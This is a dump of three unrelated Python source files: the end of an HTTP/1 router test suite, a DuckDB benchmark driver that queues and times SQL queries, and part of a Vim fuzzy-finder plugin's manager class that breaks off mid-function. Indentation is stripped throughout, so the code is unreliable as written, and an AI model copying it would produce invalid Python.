for req, _, val in tests:
req.send_request(client)
rsp = client.getresponse()
try:
body = val.check_response(rsp)
except Exception as exc:
self.fail("request failed: %s" % str(exc))
if req.method == "BODY":
self.assertEqual(b'', body)
def test_001_get(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["GET"])
client.close()
def test_002_head(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["HEAD"])
client.close()
def test_003_post(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["POST"])
client.close()
def test_004_put(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["PUT"])
client.close()
def test_006_head_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["HEAD"])
client.close()
def test_007_post_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["POST"])
client.close()
def test_008_put_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["PUT"])
client.close()
class Http1OneRouterTestBase(TestCase):
# HTTP/1.1 compliant test cases
@classmethod
def router(cls, name, mode, extra):
config = [
('router', {'mode': mode,
'id': name,
'allowUnsettledMulticast': 'yes'}),
('listener', {'role': 'normal',
'port': cls.tester.get_port()}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address',
{'prefix': 'multicast', 'distribution': 'multicast'}),
]
if extra:
config.extend(extra)
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
return cls.routers[-1]
@classmethod
def setUpClass(cls):
"""Start a router"""
super(Http1OneRouterTestBase, cls).setUpClass()
cls.http_server11_port = cls.tester.get_port()
cls.http_server10_port = cls.tester.get_port()
cls.http_listener11_port = cls.tester.get_port()
cls.http_listener10_port = cls.tester.get_port()
class Http1Edge2EdgeTestBase(TestCase):
@classmethod
def router(cls, name, mode, extra):
config = [
('router', {'mode': mode,
'id': name,
'allowUnsettledMulticast': 'yes'}),
('listener', {'role': 'normal',
'port': cls.tester.get_port()}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address', {'prefix': 'multicast', 'distribution': 'multicast'}),
]
if extra:
config.extend(extra)
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
return cls.routers[-1]
@classmethod
def setUpClass(cls):
"""Start a router"""
super(Http1Edge2EdgeTestBase, cls).setUpClass()
cls.routers = []
cls.INTA_edge1_port = cls.tester.get_port()
cls.INTA_edge2_port = cls.tester.get_port()
cls.http_server11_port = cls.tester.get_port()
cls.http_listener11_port = cls.tester.get_port()
cls.http_server10_port = cls.tester.get_port()
cls.http_listener10_port = cls.tester.get_port()
|
duckdb.py
|
import json
import datetime, time
import itertools
import duckdb
import decimal
import os
import multiprocessing
from multiprocessing import Queue
import util
import queue
from queue import Empty
import threading
from threading import Thread
import logging
logger = logging.getLogger("ssb")
class SSBDriver:
def init(self, options):
self.isRunning = False
        self.requests = queue.Queue()  # FIFO queue of pending requests
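        # duckdb.config.json is expected one directory above this file and
        # must provide 'dbFilename' (used by create_connection below)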
self.config = json.load(open(os.path.join(os.path.dirname(__file__),'..','duckdb.config.json')))
def create_connection(self):
connection = duckdb.connect(self.config['dbFilename'])
return connection
def execute_query(self, query):
        # open a dedicated connection for this query (there is no connection pool here)
sql_statement = query
#logger.info("(%s) %s" % (request.ssb_id,sql_statement))
connection = self.create_connection()
cursor = connection.cursor()
cursor.execute(sql_statement)
data = cursor.fetchall()
        # no pool to return the connection to; release the cursor and close the connection
        cursor.close()
        connection.close()
results = []
for row in data:
results.append(row)
return results
def execute_request(self, request, result_queue, options):
sql_statement = request.sql_statement
#logger.info("(%s) %s" % (request.ssb_id,sql_statement))
        # open a dedicated connection for this request (there is no connection pool here)
connection = self.create_connection()
cursor = connection.cursor()
request.start_time = util.get_current_ms_time()
cursor.execute(sql_statement)
data = cursor.fetchall()
request.end_time = util.get_current_ms_time()
        # no pool to return the connection to; release the cursor and close the connection
        cursor.close()
        connection.close()
results = []
for row in data:
results.append(row)
request.result = results
result_queue.put(request)
def process_request(self, request, result_queue, options):
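        # queue the request for the worker thread started by workflow_start();
        # the timed result is delivered back on result_queue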
self.requests.put((request, result_queue, options))
def process(self):
self.conn = self.create_connection()
        # while the workflow is running, take the next request from the FIFO queue and execute it
while self.isRunning:
try:
requestObject = self.requests.get(timeout=1)
request = requestObject[0]
result_queue = requestObject[1]
options = requestObject[2]
self.execute_request(request, result_queue, options)
except Empty:
# ignore queue-empty exceptions
pass
except Exception as e:
logger.error("exception occurred")
logger.error(e)
raise
self.conn.close()
return
def workflow_start(self):
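        # start the background worker that drains self.requests (see process());
        # workflow_end() clears the flag so the worker exits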
self.isRunning = True
thread = Thread(target = self.process)
thread.start()
def workflow_end(self):
self.isRunning = False
|
manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import vim
import os
import sys
import json
import time
import operator
import itertools
import threading
import multiprocessing
from functools import partial
from functools import wraps
from .instance import LfInstance
from .cli import LfCli
from .utils import *
from .fuzzyMatch import FuzzyMatch
from .asyncExecutor import AsyncExecutor
from .devicons import (
webDevIconsGetFileTypeSymbol,
removeDevIcons
)
is_fuzzyEngine_C = False
try:
import fuzzyEngine
is_fuzzyEngine_C = True
cpu_count = multiprocessing.cpu_count()
lfCmd("let g:Lf_fuzzyEngine_C = 1")
except ImportError:
lfCmd("let g:Lf_fuzzyEngine_C = 0")
is_fuzzyMatch_C = False
try:
import fuzzyMatchC
is_fuzzyMatch_C = True
lfCmd("let g:Lf_fuzzyMatch_C = 1")
except ImportError:
lfCmd("let g:Lf_fuzzyMatch_C = 0")
if sys.version_info >= (3, 0):
def isAscii(str):
try:
str.encode("ascii")
return True
except UnicodeEncodeError:
return False
else:
def isAscii(str):
try:
str.decode("ascii")
return True
except UnicodeDecodeError:
return False
def modifiableController(func):
@wraps(func)
def deco(self, *args, **kwargs):
self._getInstance().buffer.options['modifiable'] = True
func(self, *args, **kwargs)
self._getInstance().buffer.options['modifiable'] = False
return deco
def catchException(func):
@wraps(func)
def deco(self, *args, **kwargs):
try:
func(self, *args, **kwargs)
except vim.error as e: # for neovim
if str(e) != "b'Keyboard interrupt'" and str(e) != 'Keyboard interrupt':
raise e
elif self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
except KeyboardInterrupt: # <C-C>, this does not work in vim
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
return deco
def ignoreEvent(events):
def wrapper(func):
@wraps(func)
def deco(self, *args, **kwargs):
try:
saved_eventignore = vim.options['eventignore']
vim.options['eventignore'] = events
func(self, *args, **kwargs)
finally:
vim.options['eventignore'] = saved_eventignore
return deco
return wrapper
#*****************************************************
# Manager
#*****************************************************
class Manager(object):
def __init__(self):
self._autochdir = 0
self._instance = None
self._cli = LfCli()
self._explorer = None
self._content = []
self._index = 0
self._help_length = 0
self._show_help = False
self._selections = {}
self._highlight_pos = []
self._highlight_pos_list = []
self._highlight_refine_pos = []
self._highlight_ids = []
self._orig_line = ''
self._ctrlp_pressed = False
self._fuzzy_engine = None
self._result_content = []
self._reader_thread = None
self._timer_id = None
self._highlight_method = lambda : None
self._orig_cwd = None
self._cursorline_dict = {}
self._empty_query = lfEval("get(g:, 'Lf_EmptyQuery', 1)") == '1'
self._preview_winid = 0
self._is_previewed = False
self._match_ids = []
self._vim_file_autoloaded = False
self._arguments = {}
self._getExplClass()
#**************************************************************
# abstract methods, in fact all the functions can be overridden
#**************************************************************
def _getExplClass(self):
"""
this function MUST be overridden
return the name of Explorer class
"""
raise NotImplementedError("Can't instantiate abstract class Manager "
"with abstract methods _getExplClass")
def _defineMaps(self):
pass
def _defineCommonMaps(self):
normal_map = lfEval("get(g:, 'Lf_NormalMap', {})")
if "_" not in normal_map:
return
for [lhs, rhs] in normal_map["_"]:
# If a buffer-local mapping does not exist, map it
maparg = lfEval("maparg('{}', 'n', 0, 1)".format(lhs))
            if maparg == {} or maparg.get("buffer", "0") == "0":
lfCmd("nnoremap <buffer> <silent> {} {}".format(lhs, rhs))
def _cmdExtension(self, cmd):
"""
this function can be overridden to add new cmd
        if it returns True, the input loop exits
"""
pass
@removeDevIcons
def _argaddFiles(self, files):
# It will raise E480 without 'silent!'
lfCmd("silent! argdelete *")
for file in files:
lfCmd("argadd %s" % escSpecial(file))
def _issue_422_set_option(self):
if lfEval("has('nvim')") == '1' and self._is_previewed:
lfCmd("silent! setlocal number<")
lfCmd("silent! setlocal relativenumber<")
lfCmd("silent! setlocal cursorline<")
lfCmd("silent! setlocal colorcolumn<")
lfCmd("silent! setlocal winhighlight<")
def _acceptSelection(self, *args, **kwargs):
pass
def _getDigest(self, line, mode):
"""
this function can be overridden
        specify which part of the line is to be processed and highlighted
Args:
mode: 0, return the full path
1, return the name only
2, return the directory name
"""
if mode == 0:
return line
elif mode == 1:
return getBasename(line)
else:
return getDirname(line)
def _getDigestStartPos(self, line, mode):
"""
this function can be overridden
return the start position of the digest returned by _getDigest()
Args:
            mode: 0, return the start position of the full path
                  1, return the start position of the name only
                  2, return the start position of the directory name
"""
if mode == 0 or mode == 2:
return 0
else:
return lfBytesLen(getDirname(line))
def _createHelp(self):
return []
def _setStlMode(self, **kwargs):
if self._cli.isFuzzy:
if self._getExplorer().supportsNameOnly():
if self._cli.isFullPath:
mode = 'FullPath'
else:
mode = 'NameOnly'
else:
mode = 'Fuzzy'
else:
mode = 'Regex'
modes = {"--nameOnly", "--fullPath", "--fuzzy", "--regexMode"}
for opt in kwargs.get("arguments", {}):
if opt in modes:
if opt == "--regexMode":
mode = 'Regex'
elif self._getExplorer().supportsNameOnly():
if opt == "--nameOnly":
mode = 'NameOnly'
elif opt == "--fullPath":
mode = 'FullPath'
else: # "--fuzzy"
if self._cli.isFullPath:
mode = 'FullPath'
else:
mode = 'NameOnly'
elif opt in ("--nameOnly", "--fullPath", "--fuzzy"):
mode = 'Fuzzy'
break
self._getInstance().setStlMode(mode)
self._cli.setCurrentMode(mode)
def _beforeEnter(self):
self._resetAutochdir()
self._cur_buffer = vim.current.buffer
def _afterEnter(self):
if self._vim_file_autoloaded == False:
category = self._getExplorer().getStlCategory()
if category == 'Colorscheme':
category = 'Colors'
lfCmd("silent! call leaderf#%s#a_nonexistent_function()" % category)
self._vim_file_autoloaded = True
if "--nowrap" in self._arguments:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal nowrap')" % self._getInstance().getPopupWinId())
elif self._getInstance().getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'wrap', v:false)" % self._getInstance().getPopupWinId())
else:
self._getInstance().window.options['wrap'] = False
else:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal wrap')" % self._getInstance().getPopupWinId())
elif self._getInstance().getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'wrap', v:true)" % self._getInstance().getPopupWinId())
else:
self._getInstance().window.options['wrap'] = True
if self._getInstance().getWinPos() != 'popup':
self._defineMaps()
self._defineCommonMaps()
id = int(lfEval("matchadd('Lf_hl_cursorline', '.*\%#.*', 9)"))
self._match_ids.append(id)
else:
lfCmd("""call win_execute({}, 'let matchid = matchadd(''Lf_hl_cursorline'', ''.*\%#.*'', 9)')"""
.format(self._getInstance().getPopupWinId()))
id = int(lfEval("matchid"))
self._match_ids.append(id)
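        # create the C fuzzy-matching engine; it is torn down again in _beforeExit()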
if is_fuzzyEngine_C:
self._fuzzy_engine = fuzzyEngine.createFuzzyEngine(cpu_count, False)
def _beforeExit(self):
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
self.clearSelections()
self._getExplorer().cleanup()
if self._fuzzy_engine:
fuzzyEngine.closeFuzzyEngine(self._fuzzy_engine)
self._fuzzy_engine = None
if self._reader_thread and self._reader_thread.is_alive():
self._stop_reader_thread = True
self._closePreviewPopup()
if self._getInstance().getWinPos() == 'popup':
for i in self._match_ids:
lfCmd("silent! call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
for i in self._match_ids:
lfCmd("silent! call matchdelete(%d)" % i)
self._match_ids = []
def _afterExit(self):
pass
def _bangEnter(self):
self._preview_open = False
self._current_mode = 'NORMAL'
if self._getInstance().getWinPos() == 'popup':
self._cli.hideCursor()
if lfEval("exists('*leaderf#%s#NormalModeFilter')" % self._getExplorer().getStlCategory()) == '1':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')" % (self._getInstance().getPopupWinId(),
'leaderf#%s#NormalModeFilter' % self._getExplorer().getStlCategory()))
else:
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#NormalModeFilter', [%d]))"
% (self._getInstance().getPopupWinId(), id(self)))
self._resetHighlights()
if self._cli.pattern and self._index == 0:
self._search(self._content)
if len(self._getInstance().buffer) < len(self._result_content):
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
def _bangReadFinished(self):
if self._preview_open == False and self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._previewResult(False)
self._preview_open = True
def _getList(self, pairs):
"""
this function can be overridden
return a list constructed from pairs
Args:
pairs: a list of tuple(weight, line, ...)
"""
return [p[1] for p in pairs]
def _getUnit(self):
"""
indicates how many lines are considered as a unit
"""
return 1
def _supportsRefine(self):
return False
def _previewInPopup(self, *args, **kwargs):
pass
def _closePreviewPopup(self):
if lfEval("has('nvim')") == '1':
if self._preview_winid:
if int(lfEval("nvim_win_is_valid(%d) == v:true" % self._preview_winid)):
lfCmd("noautocmd call nvim_win_close(%d, 1)" % self._preview_winid)
self._preview_winid = 0
else:
if self._preview_winid:
lfCmd("noautocmd call popup_close(%d)" % self._preview_winid)
self._preview_winid = 0
def _previewResult(self, preview):
if self._getInstance().getWinPos() == 'floatwin':
self._cli.buildPopupPrompt()
if lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1':
if self._orig_line != self._getInstance().currentLine:
self._closePreviewPopup()
else:
return
if not self._needPreview(preview):
return
line = self._getInstance().currentLine
if lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1':
line_nr = self._getInstance().window.cursor[0]
self._previewInPopup(line, self._getInstance().buffer, line_nr)
return
orig_pos = self._getInstance().getOriginalPos()
cur_pos = (vim.current.tabpage, vim.current.window, vim.current.buffer)
saved_eventignore = vim.options['eventignore']
vim.options['eventignore'] = 'BufLeave,WinEnter,BufEnter'
try:
vim.current.tabpage, vim.current.window = orig_pos[:2]
line_nr = self._getInstance().window.cursor[0]
self._acceptSelection(line, self._getInstance().buffer, line_nr, preview=True)
lfCmd("augroup Lf_Cursorline")
lfCmd("autocmd! BufwinEnter <buffer> setlocal cursorline<")
lfCmd("augroup END")
finally:
if self._getInstance().getWinPos() != 'popup':
vim.current.tabpage, vim.current.window, vim.current.buffer = cur_pos
vim.options['eventignore'] = saved_eventignore
def _restoreOrigCwd(self):
if self._orig_cwd is None:
return
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
try:
if int(lfEval("&autochdir")) == 0 and lfGetCwd() != self._orig_cwd:
chdir(self._orig_cwd)
except:
if lfGetCwd() != self._orig_cwd:
chdir(self._orig_cwd)
def _needExit(self, line, arguments):
return True
def setArguments(self, arguments):
self._arguments = arguments
def getArguments(self):
return self._arguments
#**************************************************************
@ignoreEvent('BufWinEnter,BufEnter')
def _createPopupModePreview(self, title, source, line_nr, jump_cmd):
"""
Args:
source:
if the type is int, it is a buffer number
if the type is str, it is a file name
"""
self._is_previewed = True
if lfEval("has('nvim')") == '1':
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2
else:
maxwidth = min(width, int(lfEval("&columns")))
relative = 'editor'
if isinstance(source, int):
buffer_len = len(vim.buffers[source])
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
buffer_len = int(lfEval("len(content)"))
lfCmd("let scratch_buffer = nvim_create_buf(0, 1)")
lfCmd("call setbufline(scratch_buffer, 1, content)")
lfCmd("call nvim_buf_set_option(scratch_buffer, 'bufhidden', 'wipe')")
float_window = self._getInstance().window
float_win_row = int(float(lfEval("nvim_win_get_config(%d).row" % float_window.id)))
float_win_col = int(float(lfEval("nvim_win_get_config(%d).col" % float_window.id)))
preview_pos = lfEval("get(g:, 'Lf_PopupPreviewPosition', 'top')")
if preview_pos.lower() == 'bottom':
anchor = "NW"
if self._getInstance().getPopupInstance().statusline_win:
statusline_height = 1
else:
statusline_height = 0
row = float_win_row + float_window.height + statusline_height
col = float_win_col
height = int(lfEval("&lines")) - row - 2
if height < 1:
return
width = float_window.width
elif preview_pos.lower() == 'top':
anchor = "SW"
row = float_win_row - 1
col = float_win_col
height = row
if height < 1:
return
width = float_window.width
else:
anchor = "SW"
start = int(lfEval("line('w0')")) - 1
end = int(lfEval("line('.')")) - 1
col_width = float_window.width - int(lfEval("&numberwidth")) - 1
delta_height = lfActualLineCount(self._getInstance().buffer, start, end, col_width)
row = float_win_row + delta_height
col = float_win_col + int(lfEval("&numberwidth")) + 1 + float_window.cursor[1]
height = row
width = maxwidth
config = {
"relative": relative,
"anchor" : anchor,
"height" : height,
"width" : width,
"row" : row,
"col" : col
}
if isinstance(source, int):
self._preview_winid = int(lfEval("nvim_open_win(%d, 0, %s)" % (source, str(config))))
else:
self._preview_winid = int(lfEval("nvim_open_win(scratch_buffer, 0, %s)" % str(config)))
lfCmd("let g:Lf_PreviewWindowID[%d] = %d" % (id(self), self._preview_winid))
if jump_cmd:
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd(jump_cmd)
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
if buffer_len >= line_nr > 0:
lfCmd("""call nvim_win_set_cursor(%d, [%d, 1])""" % (self._preview_winid, line_nr))
lfCmd("call nvim_win_set_option(%d, 'number', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'relativenumber', v:false)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'foldmethod', 'manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call nvim_win_set_option(%d, 'cursorlineopt', 'both')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'colorcolumn', '')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'winhighlight', 'Normal:Lf_hl_popup_window')" % self._preview_winid)
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
if not isinstance(source, int):
lfCmd("doautocmd filetypedetect BufNewFile %s" % source)
lfCmd("silent! %foldopen!")
lfCmd("norm! zz")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
# lfCmd("redraw!") # maybe we don't need it, it makes the preview slow
else:
popup_window = self._getInstance().window
popup_pos = lfEval("popup_getpos(%d)" % popup_window.id)
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2 - 1
else:
maxwidth = min(width, int(lfEval("&columns")))
if isinstance(source, int):
buffer_len = len(vim.buffers[source])
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
buffer_len = int(lfEval("len(content)"))
preview_pos = lfEval("get(g:, 'Lf_PopupPreviewPosition', 'top')")
if preview_pos.lower() == 'bottom':
maxwidth = int(popup_pos["width"])
col = int(popup_pos["col"])
if self._getInstance().getPopupInstance().statusline_win:
statusline_height = 1
else:
statusline_height = 0
line = int(popup_pos["line"]) + int(popup_pos["height"]) + statusline_height
pos = "topleft"
maxheight = int(lfEval("&lines")) - line
if maxheight < 1:
return
if buffer_len >= maxheight: # scrollbar appear
maxwidth -= 1
elif preview_pos.lower() == 'top':
maxwidth = int(popup_pos["width"])
col = int(popup_pos["col"])
# int(popup_pos["line"]) - 1(exclude the first line) - 1(input window) - 1(title)
maxheight = int(popup_pos["line"]) - 3
if maxheight < 1:
return
if buffer_len >= maxheight: # scrollbar appear
maxwidth -= 1
pos = "botleft"
line = maxheight + 1
else: # cursor
lfCmd("""call win_execute(%d, "let numberwidth = &numberwidth")""" % popup_window.id)
col = int(popup_pos["core_col"]) + int(lfEval("numberwidth")) + popup_window.cursor[1]
lfCmd("""call win_execute(%d, "let delta_height = line('.') - line('w0')")""" % popup_window.id)
# the line of buffer starts from 0, while the line of line() starts from 1
start = int(lfEval("line('w0', %d)" % popup_window.id)) - 1
end = int(lfEval("line('.', %d)" % popup_window.id)) - 1
col_width = int(popup_pos["core_width"]) - int(lfEval("numberwidth"))
delta_height = lfActualLineCount(self._getInstance().buffer, start, end, col_width)
# int(popup_pos["core_line"]) - 1(exclude the first line) - 1(input window)
maxheight = int(popup_pos["core_line"]) + delta_height - 2
pos = "botleft"
line = maxheight + 1
options = {
"title": title,
"maxwidth": maxwidth,
"minwidth": maxwidth,
"maxheight": maxheight,
"minheight": maxheight,
"zindex": 20481,
"pos": pos,
"line": line,
"col": col,
"padding": [0, 0, 0, 0],
"border": [1, 0, 0, 0],
"borderchars": [' '],
"borderhighlight": ["Lf_hl_previewTitle"],
"filter": "leaderf#popupModePreviewFilter",
}
if preview_pos.lower() == 'bottom':
del options["title"]
options["border"] = [0, 0, 1, 0]
elif preview_pos.lower() == 'cursor' and maxheight < int(lfEval("&lines"))//2 - 2:
maxheight = int(lfEval("&lines")) - maxheight - 5
del options["title"]
options["border"] = [0, 0, 1, 0]
options["maxheight"] = maxheight
options["minheight"] = maxheight
if isinstance(source, int):
lfCmd("noautocmd silent! let winid = popup_create(%d, %s)" % (source, json.dumps(options)))
else:
lfCmd("silent! let winid = popup_create(content, %s)" % json.dumps(options))
lfCmd("call win_execute(winid, 'doautocmd filetypedetect BufNewFile %s')" % escQuote(source))
self._preview_winid = int(lfEval("winid"))
if jump_cmd:
lfCmd("""call win_execute(%d, '%s')""" % (self._preview_winid, escQuote(jump_cmd)))
elif line_nr > 0:
lfCmd("""call win_execute(%d, "call cursor(%d, 1)")""" % (self._preview_winid, line_nr))
lfCmd("call win_execute(%d, 'setlocal cursorline number norelativenumber colorcolumn= ')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal foldmethod=manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call win_execute(%d, 'setlocal cursorlineopt=both')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal wincolor=Lf_hl_popup_window')" % self._preview_winid)
if lfEval("get(g:, 'Lf_PopupShowFoldcolumn', 1)") == '0':
lfCmd("call win_execute(%d, 'setlocal foldcolumn=0')" % self._preview_winid)
else:
lfCmd("call win_execute(%d, 'setlocal foldcolumn=1')" % self._preview_winid)
lfCmd("call win_execute(%d, 'norm! zz')" % self._preview_winid)
@ignoreEvent('BufRead,BufReadPre,BufReadPost')
def _createPopupPreview(self, title, source, line_nr, jump_cmd=''):
"""
Args:
source:
if the type is int, it is a buffer number
if the type is str, it is a file name
"""
self._is_previewed = True
line_nr = int(line_nr)
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._createPopupModePreview(title, source, line_nr, jump_cmd)
return
if lfEval("has('nvim')") == '1':
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
width = int(lfEval("&columns"))//2
else:
width = min(width, int(lfEval("&columns")))
maxheight = int(lfEval("&lines - (line('w$') - line('.')) - 3"))
maxheight -= int(self._getInstance().window.height) - int(lfEval("(line('w$') - line('w0') + 1)"))
relative = 'editor'
anchor = "SW"
row = maxheight
if isinstance(source, int):
buffer_len = len(vim.buffers[source])
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
buffer_len = int(lfEval("len(content)"))
lfCmd("let scratch_buffer = nvim_create_buf(0, 1)")
lfCmd("call setbufline(scratch_buffer, 1, content)")
lfCmd("call nvim_buf_set_option(scratch_buffer, 'bufhidden', 'wipe')")
height = min(maxheight, buffer_len)
preview_pos = lfEval("get(g:, 'Lf_PreviewHorizontalPosition', 'right')")
if preview_pos.lower() == 'center':
col = (int(lfEval("&columns")) - width) // 2
elif preview_pos.lower() == 'left':
col = 0
elif preview_pos.lower() == 'right':
col = int(lfEval("&columns")) - width
else:
relative = 'cursor'
row = 0
col = 0
if maxheight < int(lfEval("&lines"))//2 - 2:
anchor = "NW"
if relative == 'cursor':
row = 1
else:
row = maxheight + 1
height = min(int(lfEval("&lines")) - maxheight - 3, buffer_len)
config = {
"relative": relative,
"anchor" : anchor,
"height" : height,
"width" : width,
"row" : row,
"col" : col
}
if isinstance(source, int):
self._preview_winid = int(lfEval("nvim_open_win(%d, 0, %s)" % (source, str(config))))
else:
self._preview_winid = int(lfEval("nvim_open_win(scratch_buffer, 0, %s)" % str(config)))
if jump_cmd:
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd(jump_cmd)
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
if buffer_len >= line_nr > 0:
lfCmd("""call nvim_win_set_cursor(%d, [%d, 1])""" % (self._preview_winid, line_nr))
lfCmd("call nvim_win_set_option(%d, 'number', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'relativenumber', v:false)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'foldmethod', 'manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call nvim_win_set_option(%d, 'cursorlineopt', 'both')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'colorcolumn', '')" % self._preview_winid)
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
if not isinstance(source, int):
lfCmd("doautocmd filetypedetect BufNewFile %s" % source)
lfCmd("silent! %foldopen!")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
preview_pos = lfEval("get(g:, 'Lf_PreviewHorizontalPosition', 'right')")
if preview_pos.lower() == 'center':
col = 0
elif preview_pos.lower() == 'left':
col = 1
elif preview_pos.lower() == 'right':
col = int(lfEval("&columns"))//2 + 2
else:
col = "cursor"
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2 - 1
else:
maxwidth = min(width, int(lfEval("&columns")))
maxheight = int(lfEval("&lines - (line('w$') - line('.')) - 4"))
maxheight -= int(self._getInstance().window.height) - int(lfEval("(line('w$') - line('w0') + 1)"))
options = {
"title": title,
"maxwidth": maxwidth,
"minwidth": maxwidth,
"maxheight": maxheight,
"minheight": maxheight,
"zindex": 20481,
"pos": "botleft",
"line": "cursor-1",
"col": col,
"padding": [0, 0, 0, 1],
"border": [1, 0, 0, 0],
"borderchars": [' '],
"borderhighlight": ["Lf_hl_previewTitle"],
"filter": "leaderf#popupModePreviewFilter",
}
if maxheight < int(lfEval("&lines"))//2 - 2:
maxheight = int(lfEval("&lines")) - maxheight - 5
del options["title"]
options["border"] = [0, 0, 1, 0]
options["maxheight"] = maxheight
options["minheight"] = maxheight
if isinstance(source, int):
lfCmd("noautocmd silent! let winid = popup_create(%d, %s)" % (source, json.dumps(options)))
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
lfCmd("silent! let winid = popup_create(content, %s)" % json.dumps(options))
lfCmd("call win_execute(winid, 'doautocmd filetypedetect BufNewFile %s')" % escQuote(source))
self._preview_winid = int(lfEval("winid"))
if self._current_mode == 'NORMAL':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#normalModePreviewFilter', [%d]))"
% (self._preview_winid, id(self)))
if jump_cmd:
lfCmd("""call win_execute(%d, '%s')""" % (self._preview_winid, escQuote(jump_cmd)))
elif line_nr > 0:
lfCmd("""call win_execute(%d, "exec 'norm! %dG'")""" % (self._preview_winid, line_nr))
lfCmd("call win_execute(%d, 'setlocal cursorline number norelativenumber')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal foldmethod=manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call win_execute(%d, 'setlocal cursorlineopt=both')" % self._preview_winid)
def _needPreview(self, preview):
"""
Args:
preview:
if True, always preview the result no matter what `g:Lf_PreviewResult` is.
"""
preview_dict = {k.lower(): v for k, v in lfEval("g:Lf_PreviewResult").items()}
category = self._getExplorer().getStlCategory()
if not preview and int(preview_dict.get(category.lower(), 0)) == 0:
return False
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
self._orig_line = self._getInstance().currentLine
return False
elif self._getInstance().window.cursor[0] <= self._help_length:
self._orig_line = self._getInstance().currentLine
return False
if self._getInstance().empty() or (self._getInstance().getWinPos() != 'popup' and
vim.current.buffer != self._getInstance().buffer):
return False
if self._ctrlp_pressed == True:
return True
line = self._getInstance().currentLine
